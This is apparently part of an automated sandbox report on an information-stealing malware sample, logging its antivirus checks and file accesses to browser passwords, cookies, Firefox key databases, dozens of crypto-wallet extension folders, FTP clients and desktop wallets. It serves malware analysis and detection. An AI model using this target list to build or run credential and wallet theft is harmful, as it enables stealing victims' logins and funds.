                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\Desktop\get_txt.ps1 VolumeInformationJump to behavior
                          Source: C:\Windows\Temp\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\Temp\cmd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: cmd.exe, 0000000A.00000003.2090430093.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000002.2102253733.0000000000C1D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2066952978.0000000000C1D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2090831892.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074333275.0000000000C1D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2067377432.0000000000BB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Windows\Temp\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6128, type: MEMORYSTR
                          Source: Yara matchFile source: 10.3.cmd.exe.c50000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.3.cmd.exe.c50000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000003.1899525334.0000000000C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: cmd.exe, 0000000A.00000003.2044239981.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
                          Source: cmd.exe, 0000000A.00000002.2102253733.0000000000C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ets/ElectronCash
                          Source: cmd.exe, 0000000A.00000002.2102253733.0000000000C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: enllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnm8s
                          Source: cmd.exe, 0000000A.00000003.2044239981.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                          Source: cmd.exe, 0000000A.00000002.2102253733.0000000000C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Ex
                          Source: cmd.exe, 0000000A.00000002.2102253733.0000000000C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ":"Sui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"
                          Source: cmd.exe, 0000000A.00000002.2102253733.0000000000C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fX
                          Source: cmd.exe, 0000000A.00000003.2044195581.0000000000C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                          Source: powershell.exe, 00000000.00000002.1410768611.0000000005829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
